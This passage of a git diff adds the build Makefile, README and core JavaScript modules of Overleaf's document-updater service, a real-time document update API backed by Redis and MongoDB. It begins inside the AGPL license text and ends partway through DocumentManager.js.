License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see <http://www.gnu.org/licenses/>. + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +<http://www.gnu.org/licenses/>. diff --git a/services/document-updater/Makefile b/services/document-updater/Makefile new file mode 100644 index 0000000..55f483f --- /dev/null +++ b/services/document-updater/Makefile @@ -0,0 +1,156 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = document-updater +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. +RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore --volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):main \ + --file Dockerfile \ + ../.. + +tar: + $(DOCKER_COMPOSE) up tar + +publish: + + docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + + +.PHONY: clean \ + format format_fix \ + lint lint_fix \ + build_types typecheck \ + lint_ci format_ci typecheck_ci \ + shellcheck shellcheck_fix \ + test test_clean test_unit test_unit_clean \ + test_acceptance test_acceptance_debug test_acceptance_pre_run \ + test_acceptance_run test_acceptance_run_debug test_acceptance_clean \ + benchmarks \ + build tar publish \ diff --git a/services/document-updater/README.md b/services/document-updater/README.md new file mode 100644 index 0000000..2e6f000 --- /dev/null +++ b/services/document-updater/README.md @@ -0,0 +1,12 @@ +overleaf/document-updater +=========================== + +An API for applying incoming updates to documents in real-time. + +License +------- + +The code in this repository is released under the GNU AFFERO GENERAL PUBLIC LICENSE, version 3. A copy can be found in the `LICENSE` file. + +Copyright (c) Overleaf, 2014-2019. + diff --git a/services/document-updater/app.js b/services/document-updater/app.js new file mode 100644 index 0000000..65c9895 --- /dev/null +++ b/services/document-updater/app.js @@ -0,0 +1,299 @@ +// Metrics must be initialized before importing anything else +require('@overleaf/metrics/initialize') + +const Metrics = require('@overleaf/metrics') +const express = require('express') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +logger.initialize('document-updater') + +logger.logger.addSerializers(require('./app/js/LoggerSerializers')) + +const RedisManager = require('./app/js/RedisManager') +const DispatchManager = require('./app/js/DispatchManager') +const DeleteQueueManager = require('./app/js/DeleteQueueManager') +const Errors = require('./app/js/Errors') +const HttpController = require('./app/js/HttpController') +const mongodb = require('./app/js/mongodb') +const async = require('async') + +const bodyParser = require('body-parser') + +Metrics.event_loop.monitor(logger, 100) +Metrics.open_sockets.monitor() + +const app = express() +app.use(bodyParser.json({ limit: Settings.maxJsonRequestSize })) +Metrics.injectMetricsRoute(app) + +DispatchManager.createAndStartDispatchers(Settings.dispatcherCount) + +app.get('/status', (req, res) => { + if (Settings.shuttingDown) { + return res.sendStatus(503) // Service unavailable + } else { + return res.send('document updater is alive') + } +}) + +const pubsubClient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.pubsub +) +app.get('/health_check/redis', (req, res, next) => { + pubsubClient.healthCheck(error => { + if (error) { + logger.err({ err: error }, 'failed redis health check') + return res.sendStatus(500) + } else { + return res.sendStatus(200) + } + }) +}) + +const docUpdaterRedisClient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +app.get('/health_check/redis_cluster', (req, res, next) => { + docUpdaterRedisClient.healthCheck(error => { + if (error) { + logger.err({ err: error }, 'failed redis cluster health check') + return res.sendStatus(500) + } else { + return res.sendStatus(200) + } + }) +}) + +app.get('/health_check', (req, res, next) => { + async.series( + [ + cb => { + pubsubClient.healthCheck(error => { + if (error) { + logger.err({ err: error }, 'failed redis health check') + } + cb(error) + }) + }, + cb => { + docUpdaterRedisClient.healthCheck(error => { + if (error) { + logger.err({ err: error }, 'failed redis cluster health check') + } + cb(error) + }) + }, + cb => { + mongodb.healthCheck(error => { + if (error) { + logger.err({ err: error }, 'failed mongo health check') + } + cb(error) + }) + }, + ], + error => { + if (error) { + return res.sendStatus(500) + } else { + return res.sendStatus(200) + } + } + ) +}) + +// record http metrics for the routes below this point +app.use(Metrics.http.monitor(logger)) + +app.param('project_id', (req, res, next, projectId) => { + if (projectId != null && projectId.match(/^[0-9a-f]{24}$/)) { + return next() + } else { + return next(new Error('invalid project id')) + } +}) + +app.param('doc_id', (req, res, next, docId) => { + if (docId != null && docId.match(/^[0-9a-f]{24}$/)) { + return next() + } else { + return next(new Error('invalid doc id')) + } +}) + +// Record requests that come in after we've started shutting down - for investigation. +app.use((req, res, next) => { + if (Settings.shuttingDown) { + logger.warn( + { req, timeSinceShutdown: Date.now() - Settings.shutDownTime }, + 'request received after shutting down' + ) + // We don't want keep-alive connections to be kept open when the server is shutting down. + res.set('Connection', 'close') + } + next() +}) + +app.get('/project/:project_id/doc/:doc_id', HttpController.getDoc) +app.get( + '/project/:project_id/doc/:doc_id/comment/:comment_id', + HttpController.getComment +) +app.get('/project/:project_id/doc/:doc_id/peek', HttpController.peekDoc) +// temporarily keep the GET method for backwards compatibility +app.get('/project/:project_id/doc', HttpController.getProjectDocsAndFlushIfOld) +// will migrate to the POST method of get_and_flush_if_old instead +app.post( + '/project/:project_id/get_and_flush_if_old', + HttpController.getProjectDocsAndFlushIfOld +) +app.get( + '/project/:project_id/last_updated_at', + HttpController.getProjectLastUpdatedAt +) +app.post('/project/:project_id/clearState', HttpController.clearProjectState) +app.post('/project/:project_id/doc/:doc_id', HttpController.setDoc) +app.post('/project/:project_id/doc/:doc_id/append', HttpController.appendToDoc) +app.post( + '/project/:project_id/doc/:doc_id/flush', + HttpController.flushDocIfLoaded +) +app.delete('/project/:project_id/doc/:doc_id', HttpController.deleteDoc) +app.delete('/project/:project_id', HttpController.deleteProject) +app.delete('/project', HttpController.deleteMultipleProjects) +app.post('/project/:project_id', HttpController.updateProject) +app.post( + '/project/:project_id/history/resync', + longerTimeout, + HttpController.resyncProjectHistory +) +app.post('/project/:project_id/flush', HttpController.flushProject) +app.post( + '/project/:project_id/doc/:doc_id/change/:change_id/accept', + HttpController.acceptChanges +) +app.post( + '/project/:project_id/doc/:doc_id/change/accept', + HttpController.acceptChanges +) +app.post( + '/project/:project_id/doc/:doc_id/comment/:comment_id/resolve', + HttpController.resolveComment +) +app.post( + '/project/:project_id/doc/:doc_id/comment/:comment_id/reopen', + HttpController.reopenComment +) +app.delete( + '/project/:project_id/doc/:doc_id/comment/:comment_id', + HttpController.deleteComment +) + +app.post('/project/:project_id/block', HttpController.blockProject) +app.post('/project/:project_id/unblock', HttpController.unblockProject) + +app.get('/flush_queued_projects', HttpController.flushQueuedProjects) + +app.get('/total', (req, res, next) => { + const timer = new Metrics.Timer('http.allDocList') + RedisManager.getCountOfDocsInMemory((err, count) => { + if (err) { + return next(err) + } + timer.done() + res.send({ total: count }) + }) +}) + +app.use((error, req, res, next) => { + if (error instanceof Errors.NotFoundError) { + return res.sendStatus(404) + } else if (error instanceof Errors.OpRangeNotAvailableError) { + return res.status(422).json(error.info) + } else if (error instanceof Errors.FileTooLargeError) { + return res.sendStatus(413) + } else if (error.statusCode === 413) { + return res.status(413).send('request entity too large') + } else { + logger.error({ err: error, req }, 'request errored') + return res.status(500).send('Oops, something went wrong') + } +}) + +const shutdownCleanly = signal => () => { + logger.info({ signal }, 'received interrupt, cleaning up') + if (Settings.shuttingDown) { + logger.warn({ signal }, 'already shutting down, ignoring interrupt') + return + } + Settings.shuttingDown = true + // record the time we started shutting down + Settings.shutDownTime = Date.now() + setTimeout(() => { + logger.info({ signal }, 'shutting down') + process.exit() + }, Settings.gracefulShutdownDelayInMs) +} + +const watchForEvent = eventName => { + docUpdaterRedisClient.on(eventName, e => { + console.log(`redis event: ${eventName} ${e}`) // eslint-disable-line no-console + }) +} + +const events = ['connect', 'ready', 'error', 'close', 'reconnecting', 'end'] +for (const eventName of events) { + watchForEvent(eventName) +} + +const port = + Settings.internal.documentupdater.port || + (Settings.api && + Settings.api.documentupdater && + Settings.api.documentupdater.port) || + 3003 +const host = Settings.internal.documentupdater.host || '127.0.0.1' + +if (!module.parent) { + // Called directly + mongodb.mongoClient + .connect() + .then(() => { + app.listen(port, host, function (err) { + if (err) { + logger.fatal({ err }, `Cannot bind to ${host}:${port}. Exiting.`) + process.exit(1) + } + logger.info( + `Document-updater starting up, listening on ${host}:${port}` + ) + if (Settings.continuousBackgroundFlush) { + logger.info('Starting continuous background flush') + DeleteQueueManager.startBackgroundFlush() + } + }) + }) + .catch(err => { + logger.fatal({ err }, 'Cannot connect to mongo. Exiting.') + process.exit(1) + }) +} + +module.exports = app + +for (const signal of [ + 'SIGINT', + 'SIGHUP', + 'SIGQUIT', + 'SIGUSR1', + 'SIGUSR2', + 'SIGTERM', + 'SIGABRT', +]) { + process.on(signal, shutdownCleanly(signal)) +} + +function longerTimeout(req, res, next) { + res.setTimeout(6 * 60 * 1000) + next() +} diff --git a/services/document-updater/app/js/DeleteQueueManager.js b/services/document-updater/app/js/DeleteQueueManager.js new file mode 100644 index 0000000..39fa275 --- /dev/null +++ b/services/document-updater/app/js/DeleteQueueManager.js @@ -0,0 +1,145 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let DeleteQueueManager +const Settings = require('@overleaf/settings') +const RedisManager = require('./RedisManager') +const ProjectManager = require('./ProjectManager') +const logger = require('@overleaf/logger') +const metrics = require('./Metrics') + +// Maintain a sorted set of project flushAndDelete requests, ordered by timestamp +// (ZADD), and process them from oldest to newest. A flushAndDelete request comes +// from real-time and is triggered when a user leaves a project. +// +// The aim is to remove the project from redis 5 minutes after the last request +// if there has been no activity (document updates) in that time. If there is +// activity we can expect a further flushAndDelete request when the editing user +// leaves the project. +// +// If a new flushAndDelete request comes in while an existing request is already +// in the queue we update the timestamp as we can postpone flushing further. +// +// Documents are processed by checking the queue, seeing if the first entry is +// older than 5 minutes, and popping it from the queue in that case. + +module.exports = DeleteQueueManager = { + flushAndDeleteOldProjects(options, callback) { + const startTime = Date.now() + const cutoffTime = + startTime - options.min_delete_age + 100 * (Math.random() - 0.5) + let count = 0 + + const flushProjectIfNotModified = (projectId, flushTimestamp, cb) => + ProjectManager.getProjectDocsTimestamps( + projectId, + function (err, timestamps) { + if (err != null) { + return callback(err) + } + if (timestamps.length === 0) { + logger.debug( + { projectId }, + 'skipping flush of queued project - no timestamps' + ) + return cb() + } + // are any of the timestamps newer than the time the project was flushed? + for (const timestamp of Array.from(timestamps)) { + if (timestamp > flushTimestamp) { + metrics.inc('queued-delete-skipped') + logger.debug( + { projectId, timestamps, flushTimestamp }, + 'found newer timestamp, will skip delete' + ) + return cb() + } + } + logger.debug({ projectId, flushTimestamp }, 'flushing queued project') + return ProjectManager.flushAndDeleteProjectWithLocks( + projectId, + { skip_history_flush: false }, + function (err) { + if (err != null) { + logger.err({ projectId, err }, 'error flushing queued project') + } + metrics.inc('queued-delete-completed') + return cb(null, true) + } + ) + } + ) + + function flushNextProject() { + const now = Date.now() + if (now - startTime > options.timeout) { + logger.debug('hit time limit on flushing old projects') + return callback(null, count) + } + if (count > options.limit) { + logger.debug('hit count limit on flushing old projects') + return callback(null, count) + } + return RedisManager.getNextProjectToFlushAndDelete( + cutoffTime, + function (err, projectId, flushTimestamp, queueLength) { + if (err != null) { + return callback(err, count) + } + if (projectId == null) { + return callback(null, count) + } + logger.debug({ projectId, queueLength }, 'flushing queued project') + metrics.globalGauge('queued-flush-backlog', queueLength) + return flushProjectIfNotModified( + projectId, + flushTimestamp, + function (err, flushed) { + if (err) { + // Do not stop processing the queue in case the flush fails. + // Slowing down the processing can fill up redis. + metrics.inc('queued-delete-error') + } + if (flushed) { + count++ + } + return flushNextProject() + } + ) + } + ) + } + + return flushNextProject() + }, + + startBackgroundFlush() { + const SHORT_DELAY = 10 + const LONG_DELAY = 1000 + function doFlush() { + if (Settings.shuttingDown) { + logger.info('discontinuing background flush due to shutdown') + return + } + return DeleteQueueManager.flushAndDeleteOldProjects( + { + timeout: 1000, + min_delete_age: 3 * 60 * 1000, + limit: 1000, // high value, to ensure we always flush enough projects + }, + (_err, flushed) => + setTimeout(doFlush, flushed > 10 ? SHORT_DELAY : LONG_DELAY) + ) + } + return doFlush() + }, +} diff --git a/services/document-updater/app/js/DiffCodec.js b/services/document-updater/app/js/DiffCodec.js new file mode 100644 index 0000000..245903c --- /dev/null +++ b/services/document-updater/app/js/DiffCodec.js @@ -0,0 +1,40 @@ +const DMP = require('diff-match-patch') +const dmp = new DMP() + +// Do not attempt to produce a diff for more than 100ms +dmp.Diff_Timeout = 0.1 + +module.exports = { + ADDED: 1, + REMOVED: -1, + UNCHANGED: 0, + + diffAsShareJsOp(before, after) { + const diffs = dmp.diff_main(before.join('\n'), after.join('\n')) + dmp.diff_cleanupSemantic(diffs) + + const ops = [] + let position = 0 + for (const diff of diffs) { + const type = diff[0] + const content = diff[1] + if (type === this.ADDED) { + ops.push({ + i: content, + p: position, + }) + position += content.length + } else if (type === this.REMOVED) { + ops.push({ + d: content, + p: position, + }) + } else if (type === this.UNCHANGED) { + position += content.length + } else { + throw new Error('Unknown type') + } + } + return ops + }, +} diff --git a/services/document-updater/app/js/DispatchManager.js b/services/document-updater/app/js/DispatchManager.js new file mode 100644 index 0000000..95ac03b --- /dev/null +++ b/services/document-updater/app/js/DispatchManager.js @@ -0,0 +1,112 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS202: Simplify dynamic range loops + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let DispatchManager +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const Keys = require('./UpdateKeys') +const redis = require('@overleaf/redis-wrapper') +const Errors = require('./Errors') +const _ = require('lodash') + +const UpdateManager = require('./UpdateManager') +const Metrics = require('./Metrics') +const RateLimitManager = require('./RateLimitManager') + +module.exports = DispatchManager = { + createDispatcher(RateLimiter, queueShardNumber) { + let pendingListKey + if (queueShardNumber === 0) { + pendingListKey = 'pending-updates-list' + } else { + pendingListKey = `pending-updates-list-${queueShardNumber}` + } + + const client = redis.createClient(Settings.redis.documentupdater) + const worker = { + client, + _waitForUpdateThenDispatchWorker(callback) { + if (callback == null) { + callback = function () {} + } + const timer = new Metrics.Timer('worker.waiting') + return worker.client.blpop(pendingListKey, 0, function (error, result) { + logger.debug(`getting ${queueShardNumber}`, error, result) + timer.done() + if (error != null) { + return callback(error) + } + if (result == null) { + return callback() + } + const [listName, docKey] = Array.from(result) + const [projectId, docId] = Array.from( + Keys.splitProjectIdAndDocId(docKey) + ) + // Dispatch this in the background + const backgroundTask = cb => + UpdateManager.processOutstandingUpdatesWithLock( + projectId, + docId, + function (error) { + // log everything except OpRangeNotAvailable errors, these are normal + if (error != null) { + // downgrade OpRangeNotAvailable and "Delete component" errors so they are not sent to sentry + const logAsDebug = + error instanceof Errors.OpRangeNotAvailableError || + error instanceof Errors.DeleteMismatchError + if (logAsDebug) { + logger.debug( + { err: error, projectId, docId }, + 'error processing update' + ) + } else { + logger.error( + { err: error, projectId, docId }, + 'error processing update' + ) + } + } + return cb() + } + ) + return RateLimiter.run(backgroundTask, callback) + }) + }, + + run() { + if (Settings.shuttingDown) { + return + } + return worker._waitForUpdateThenDispatchWorker(error => { + if (error != null) { + logger.error({ err: error }, 'Error in worker process') + throw error + } else { + return worker.run() + } + }) + }, + } + + return worker + }, + + createAndStartDispatchers(number) { + const RateLimiter = new RateLimitManager(number) + _.times(number, function (shardNumber) { + return DispatchManager.createDispatcher(RateLimiter, shardNumber).run() + }) + }, +} diff --git a/services/document-updater/app/js/DocumentManager.js b/services/document-updater/app/js/DocumentManager.js new file mode 100644 index 0000000..540a8a2 --- /dev/null +++ b/services/document-updater/app/js/DocumentManager.js @@ -0,0 +1,708 @@ +const { callbackifyAll } = require('@overleaf/promise-utils') +const RedisManager = require('./RedisManager') +const ProjectHistoryRedisManager = require('./ProjectHistoryRedisManager') +const PersistenceManager = require('./PersistenceManager') +const DiffCodec = require('./DiffCodec') +const logger = require('@overleaf/logger') +const Metrics = require('./Metrics') +const HistoryManager = require('./HistoryManager') +const Errors = require('./Errors') +const RangesManager = require('./RangesManager') +const { extractOriginOrSource } = require('./Utils') +const { getTotalSizeOfLines } = require('./Limits') +const Settings = require('@overleaf/settings') + +const MAX_UNFLUSHED_AGE = 300 * 1000 // 5 mins, document should be flushed to mongo this time after a change + +const DocumentManager = { + async getDoc(projectId, docId) { + const { + lines, + version, + ranges, + resolvedCommentIds, + pathname, + projectHistoryId, + unflushedTime, + historyRangesSupport, + } = await RedisManager.promises.getDoc(projectId, docId) + if (lines == null || version == null) { + logger.debug( + { projectId, docId }, + 'doc not in redis so getting from persistence API' + ) + const { + lines, + version, + ranges, + resolvedCommentIds, + pathname, + projectHistoryId, + historyRangesSupport, + } = await PersistenceManager.promises.getDoc(projectId, docId) + logger.debug( + { + projectId, + docId, + lines, + ranges, + resolvedCommentIds, + version, + pathname, + projectHistoryId, + historyRangesSupport, + }, + 'got doc from persistence API' + ) + await RedisManager.promises.putDocInMemory( + projectId, + docId, + lines, + version, + ranges, + resolvedCommentIds, + pathname, + projectHistoryId, + historyRangesSupport + ) + return { + lines, + version, + ranges: ranges || {}, + resolvedCommentIds, + pathname, + projectHistoryId, + unflushedTime: null, + alreadyLoaded: false, + historyRangesSupport, + } + } else { + return { + lines, + version, + ranges, + pathname, + projectHistoryId, + resolvedCommentIds, + unflushedTime, + alreadyLoaded: true, + historyRangesSupport, + } + } + }, + + async getDocAndRecentOps(projectId, docId, fromVersion) { + const { lines, version, ranges, pathname, projectHistoryId } = + await DocumentManager.getDoc(projectId, docId) + + if (fromVersion === -1) { + return { lines, version, ops: [], ranges, pathname, projectHistoryId } + } else { + const ops = await RedisManager.promises.getPreviousDocOps( + docId, + fromVersion, + version + ) + return { + lines, + version, + ops, + ranges, + pathname, + projectHistoryId, + } + } + }, + + async appendToDoc(projectId, docId, linesToAppend, originOrSource, userId) { + const { lines: currentLines } = await DocumentManager.getDoc( + projectId, + docId + ) + const currentLineSize = getTotalSizeOfLines(currentLines) + const addedSize = getTotalSizeOfLines(linesToAppend) + const newlineSize = '\n'.length + + if (currentLineSize + newlineSize + addedSize > Settings.max_doc_length) { + throw new Errors.FileTooLargeError( + 'doc would become too large if appending this text' + ) + } + + return await DocumentManager.setDoc( + projectId, + docId, + currentLines.concat(linesToAppend), + originOrSource, + userId, + false, + false + ) + }, + + async setDoc( + projectId, + docId, + newLines, + originOrSource, + userId, + undoing, + external + ) { + if (newLines == null) { + throw new Error('No lines were provided to setDoc') + } + + const UpdateManager = require('./UpdateManager') + const { + lines: oldLines, + version, + alreadyLoaded, + } = await DocumentManager.getDoc(projectId, docId) + + if (oldLines != null && oldLines.length > 0 && oldLines[0].text != null) { + logger.debug( + { docId, projectId, oldLines, newLines }, + 'document is JSON so not updating' + ) + return + } + + logger.debug( + { docId, projectId, oldLines, newLines }, + 'setting a document via http' + ) + const op = DiffCodec.diffAsShareJsOp(oldLines, newLines) + if (undoing) { + for (const o of op || []) { + o.u = true + } // Turn on undo flag for each op for track changes + } + + const { origin, source } = extractOriginOrSource(originOrSource) + + const update = { + doc: docId, + op, + v: version, + meta: { + user_id: userId, + }, + } + if (external) { + update.meta.type = 'external' + } + if (origin) { + update.meta.origin = origin + } else if (source) { + update.meta.source = source + } + // Keep track of external updates, whether they are for live documents + // (flush) or unloaded documents (evict), and whether the update is a no-op. + Metrics.inc('external-update', 1, { + status: op.length > 0 ? 'diff' : 'noop', + method: alreadyLoaded ? 'flush' : 'evict', + path: source, + }) + + // Do not notify the frontend about a noop update. + // We still want to execute the code below + // to evict the doc if we loaded it into redis for + // this update, otherwise the doc would never be + // removed from redis. + if (op.length > 0) { + await UpdateManager.promises.applyUpdate(projectId, docId, update) + } + + // If the document was loaded already, then someone has it open + // in a project, and the usual flushing mechanism will happen. + // Otherwise we should remove it immediately since nothing else + // is using it. + if (alreadyLoaded) { + return await DocumentManager.flushDocIfLoaded(projectId, docId) + } else { + try { + return await DocumentManager.flushAndDeleteDoc(projectId, docId, {}) + } finally { + // There is no harm in flushing project history if the previous + // call failed and sometimes it is required + HistoryManager.flushProjectChangesAsync(projectId) + } + } + }, + + async flushDocIfLoaded(projectId, docId) { + const { + lines, + version, + ranges, + unflushedTime, + lastUpdatedAt, + lastUpdatedBy, + } = await RedisManager.promises.getDoc(projectId, docId) + if (lines == null || version == null) { + Metrics.inc('flush-doc-if-loaded', 1, { status: 'not-loaded' }) + logger.debug({ projectId, docId }, 'doc is not loaded so not flushing') + // TODO: return a flag to bail out, as we go on to remove doc from memory? + return + } else if (unflushedTime == null) { + Metrics.inc('flush-doc-if-loaded', 1, { status: 'unmodified' }) + logger.debug({ projectId, docId }, 'doc is not modified so not flushing') + return + } + + logger.debug({ projectId, docId, version }, 'flushing doc') + Metrics.inc('flush-doc-if-loaded', 1, { status: 'modified' }) + const result = await PersistenceManager.promises.setDoc( + projectId, + docId, + lines, + version, + ranges, + lastUpdatedAt, + lastUpdatedBy || null + ) + await RedisManager.promises.clearUnflushedTime(docId) + return result + }, + + async flushAndDeleteDoc(projectId, docId, options) { + let result + try { + result = await DocumentManager.flushDocIfLoaded(projectId, docId) + } catch (error) { + if (options.ignoreFlushErrors) { + logger.warn( + { projectId, docId, err: error }, + 'ignoring flush error while deleting document' + ) + } else { + throw error + } + } + + await RedisManager.promises.removeDocFromMemory(projectId, docId) + return result + }, + + async acceptChanges(projectId, docId, changeIds) { + if (changeIds == null) { + changeIds = [] + } + + const { + lines, + version, + ranges, + pathname, + projectHistoryId, + historyRangesSupport, + } = await DocumentManager.getDoc(projectId, docId) + if (lines == null || version == null) { + throw new Errors.NotFoundError(`document not found: ${docId}`) + } + + const newRanges = RangesManager.acceptChanges( + projectId, + docId, + changeIds, + ranges, + lines + ) + + await RedisManager.promises.updateDocument( + projectId, + docId, + lines, + version, + [], + newRanges, + {} + ) + + if (historyRangesSupport) { + const historyUpdates = RangesManager.getHistoryUpdatesForAcceptedChanges({ + docId, + acceptedChangeIds: changeIds, + changes: ranges.changes || [], + lines, + pathname, + projectHistoryId, + }) + + if (historyUpdates.length === 0) { + return + } + + await ProjectHistoryRedisManager.promises.queueOps( + projectId, + ...historyUpdates.map(op => JSON.stringify(op)) + ) + } + }, + + async updateCommentState(projectId, docId, commentId, userId, resolved) { + const { lines, version, pathname, historyRangesSupport } = + await DocumentManager.getDoc(projectId, docId) + + if (lines == null || version == null) { + throw new Errors.NotFoundError(`document not found: ${docId}`) + } + + if (historyRangesSupport) { + await RedisManager.promises.updateCommentState(docId, commentId, resolved) + + await ProjectHistoryRedisManager.promises.queueOps( + projectId, + JSON.stringify({ + pathname, + commentId, + resolved, + meta: { + ts: new Date(), + user_id: userId, + }, + }) + ) + } + }, + + async getComment(projectId, docId, commentId) { + const { ranges } = await DocumentManager.getDoc(projectId, docId) + + const comment = ranges?.comments?.find(comment => comment.id === commentId) + + if (!comment) { + throw new Errors.NotFoundError({ + message: 